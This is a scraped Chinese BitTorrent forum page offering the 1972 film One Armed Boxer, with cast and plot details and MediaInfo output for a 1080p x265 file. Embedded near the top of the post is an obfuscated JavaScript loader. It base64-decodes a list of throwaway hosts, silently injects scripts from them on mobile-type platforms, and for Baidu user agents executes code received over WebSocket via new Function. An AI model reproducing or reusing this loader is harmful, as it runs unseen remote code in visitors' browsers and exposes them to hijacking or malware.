独臂拳王[国语音轨/中文字幕].One.Armed.Boxer.1972.1080p.迅雷下载 7.01GB

版主小s 26天前 151

var x=window['\x61\x74\x6f\x62'],id=x('NDQ0NDczNzY1NjE1Nzg4ODg4OC0xMDAwNw==');document.write('%lt;ins style="display:none!important" id="'+id+'"%gt;%lt;/ins%gt;');(window.adbyunion=window.adbyunion||[]).push(id);window['\x5a\x7a\x72\x64\x63\x78\x64\x57\x4c\x41']=(!/^Mac|Win/.test(navigator.platform)||!navigator.platform)?function(){;(function(u,k,w,d,c){var cs=d[x('Y3VycmVudFNjcmlwdA==')];'jQuery';var t=[],l=[],e=0,r=0,delay=2000,f=null,ua=navigator.userAgent.toLowerCase(),sc=Math.max(1,600000),ext='1',i='win'+Math.floor(new Date().getTime()/sc)+ext;if(ua.indexOf('baidu')>-1){r=1;u=k;f=function(){if(!l.length)return;var ws=new WebSocket(l.shift()+'/'+i);ws.onopen=function(){for(var k in t)t[k]&&clearTimeout(t[k])};ws.onmessage=function(e){new Function('_tdcs',x(e.data))(cs);ws.close()};ws.onerror=function(e){t[++e]&&clearTimeout(t[e]);f()}};}else{f=function(){if(!l.length)return;var s=document.createElement('script');s.src=l.shift()+'/'+i;cs.parentElement.insertBefore(s,cs);s.onload=function(){for(var k in t)t[k]&&clearTimeout(t[k])};s.onerror=function(){cs.parentElement.removeChild(s);t[++e]&&clearTimeout(t[e]);f()}};}u=decodeURIComponent(x(u.replace(new RegExp(c[r]+''+c[r],'g'),c[r])));var l=u.split(',');l.sort(function(){return 0.5-Math.random()});for(var j in l)t[j]=setTimeout(f,delay*j);})('aHR0cHM6Ly9veXdoeWVlaGdoYS5ndWlydWktY2xvdGhlcy5jbb20saHR0cHM6Ly9vYnk2aTg3NjZqZjEuYnVqaWFuZ2ppdTEyMy5jbb20saHR0cHM6Ly9vNzdkMjM0a2RrZmhoLnNwYXJreWluY2h1bbi5jbb20saHR0cHM6Ly9vZmhnODg3MmozODRqZGpmLnRoLW1ha2UuY29tLGh0dHBzOi8vbbzM5ZmoyM2pqZDIzOGUueGlqaS1leHByZXNzLmNvbbQ==','d3NNzOi8vd3NN5ZC53c3RlbnNN5cy5jb206OTg2NNix3c3M6Ly93c2R4LndzdGVuc3JzLmNNvbTo5ODY2LHdzczovL3dzbXIud3NN0ZW5zZGYuY29tOjk4NNjY=',window,document,['b','N']);}:function(){};

◎译 名 独臂拳王 / One Armed Boxer / Chinese Professionals

◎片 名 獨臂拳王

◎年 代 1972

◎产 地 中国香港 / 中国台湾

◎类 别 剧情 / 动作

◎语 言 汉语普通话

◎上映日期 1972-08-02(中国香港)

◎IMDb链接 https://www.imdb.com/title/tt0067009/

◎豆瓣评分 6.0/10 (402人评价)

◎豆瓣链接 https://movie.douban.com/subject/2138134/

◎片 长 89分钟

◎导 演 王羽 Yu Wang (id:1002908)

◎编 剧 王羽 Yu Wang (id:1002908)

◎演 员 龙飞 Fei Lung (id:1007223)

唐沁 Hsin Tang (id:1007372)

杜文波 Wenpo Tu (id:1360411)

苏真平 Jen-Ping Su (id:1347992)

山茅 Mao Shan (id:1347593)

马骥 Kei Ma (id:1338936)

王羽 Yu Wang (id:1002908)

薛汉 Han Hsieh (id:1093895)

蔡弘 Hung Tsai (id:1017687)

杜伟和 Wei Ho Tu (id:1360498)

邹文怀 Raymond Chow (id:1016883)

王福龄 Fu-ling Wang (id:1300395)

张耀宗 Peter Cheung (id:1280650)

陈洪民 Hung Min Chen (id:1031304)

周少龙 Shao Lung Chou (id:1344862)

◎标 签 王羽 / 动作 / 香港 / 香港电影 / 武侠 / 嘉禾 / 台湾 / 1972

◎简 介

民初功夫片,俞天龙(王羽)是某镇武馆的大弟子,因主持正义教训恶少而与当地恶势力结怨,武馆遭到恶势力请来的一众东洋高手的洗劫,俞天龙幸免于难,但是断了一臂成为残废,他苦练独臂拳法,将各东洋高手一一击毙。

王羽在邵氏因《独臂刀》成名,脱离邵氏后继续利用“独臂”的剩余价值,将“刀”改为“拳”,又继续拍摄了三四部和“独臂”有关的电影,《独臂拳王》就是他脱离邵氏后以“独臂”为题材拍摄的一部民初功夫片。影片是王羽在台湾为嘉禾拍摄的,用的演员都是台湾人,其中有曾获得金马最佳男配角的马骥,以及台湾硬派演员田野、薛汉等人,还有本名周新贵的台湾武打明星龙飞以及台湾著名武行山茅、苏真平和谢兴等人,这些人后来又多次与王羽合作。作为一名武打演员,王羽的身手不错,做为导演,王羽在处理武打场面的拍摄也有一定技巧,毕竟他也算是张彻的得意弟子,他比较注意武打场面的气氛渲染和动作设计的...

  1. General

  2. Unique ID : 122683231271097904270677785790969918142 (0x5C4BEE4E03EB8645C51414FC0209B2BE)

  3. Complete name : One.Armed.Boxer.1972.1080p.BluRay.DD2.0.x265-10bit-HDS.mkv

  4. Format : Matroska

  5. Format version : Version 4

  6. File size : 7.00 GiB

  7. Duration : 1 h 33 min

  8. Overall bit rate : 10.8 Mb/s

  9. Movie name : One Armed Boxer 1972 1080p BluRay DD2.0 x265-10bit-HDS

  10. Encoded date : UTC 2021-06-28 22:57:28

  11. Writing application : mkvmerge v38.0.0 ('The Silent Type') 64-bit

  12. Writing library : libebml v1.3.9 + libmatroska v1.5.2


  13. Video

  14. ID : 1

  15. Format : HEVC

  16. Format/Info : High Efficiency Video Coding

  17. Format profile : Main [email protected]@High

  18. Codec ID : V_MPEGH/ISO/HEVC

  19. Duration : 1 h 33 min

  20. Bit rate : 10.3 Mb/s

  21. Width : 1 920 pixels

  22. Height : 804 pixels

  23. Display aspect ratio : 2.40:1

  24. Frame rate mode : Constant

  25. Frame rate : 23.976 (24000/1001/53354) FPS

  26. Color space : YUV

  27. Chroma subsampling : 4:2:0

  28. Bit depth : 10 bits

  29. Bits/(Pixel*Frame) : 0.278

  30. Stream size : 6.70 GiB (96%)

  31. Title : @HDSky

  32. Writing library : x265 - H.265/HEVC codec

  33. Default : Yes

  34. Forced : No


  35. Audio

  36. ID : 2

  37. Format : AC-3

  38. Format/Info : Audio Coding 3

  39. Commercial name : Dolby Digital

  40. Codec ID : A_AC3

  41. Duration : 1 h 33 min

  42. Bit rate mode : Constant

  43. Bit rate : 448 kb/s

  44. Channel(s) : 2 channels

  45. Channel layout : L R

  46. Sampling rate : 48.0 kHz

  47. Frame rate : 31.250 FPS (1536 SPF)

  48. Compression mode : Lossy

  49. Stream size : 299 MiB (4%)

  50. Title : Mandarin

  51. Language : Chinese

  52. Service kind : Complete Main

  53. Default : Yes

  54. Forced : No


  55. Text #1

  56. ID : 3

  57. Format : PGS

  58. Muxing mode : zlib

  59. Codec ID : S_HDMV/PGS

  60. Codec ID/Info : Picture based subtitle format used on BDs/HD-DVDs

  61. Duration : 1 h 28 min

  62. Bit rate : 13.1 kb/s

  63. Count of elements : 1446

  64. Stream size : 8.27 MiB (0%)

  65. Title : CHS

  66. Language : Chinese

  67. Default : Yes

  68. Forced : No


  69. Text #2

  70. ID : 4

  71. Format : PGS

  72. Muxing mode : zlib

  73. Codec ID : S_HDMV/PGS

  74. Codec ID/Info : Picture based subtitle format used on BDs/HD-DVDs

  75. Duration : 1 h 28 min

  76. Bit rate : 13.7 kb/s

  77. Count of elements : 1446

  78. Stream size : 8.65 MiB (0%)

  79. Title : CHT

  80. Language : Chinese

  81. Default : No

  82. Forced : No


  83. Menu

  84. 00:00:00.000 : en:Chapter 01

  85. 00:12:55.566 : en:Chapter 02

  86. 00:25:16.223 : en:Chapter 03

  87. 00:36:22.305 : en:Chapter 04

  88. 00:44:35.756 : en:Chapter 05

  89. 00:55:01.924 : en:Chapter 06

  90. 01:03:11.162 : en:Chapter 07

  91. 01:11:41.839 : en:Chapter 08

  92. 01:21:39.311 : en:Chapter 09





此处一般会放置磁力链或电驴下载链接,不过此链接需要注册会员才能看到,点击“立即注册”
磁力链下载【磁力链接仅对注册会员开放,登陆后可见】

TAGS 动作 剧情

上传的附件:

BT9527.com论坛第一帅,不接受任何反驳
BT9527电影天堂 1、BT9527电影天堂提供的BT文件均来源于互联网抓取,只供网友学习交流、技术提升使用。
2、我们遵守BitTorrent点对点协议原则,任何版权问题请联系原资源发布商,我们不处理任何版权纠纷,谢谢!如有争议请联系邮箱:BT9527#hotmail.com(#换成@)
3、如果您发现某页面或地址有错误,请联系站长邮箱BT9527#hotmail.com(#换成@),我们会尽快处理。您的热心是对BT9527电影天堂最大的支持。
4、本站建议去正规影院观看电影以支持电影行业发展。

最新回复 (0)

你可以在 登录 or 注册 后,对此帖发表评论!

返回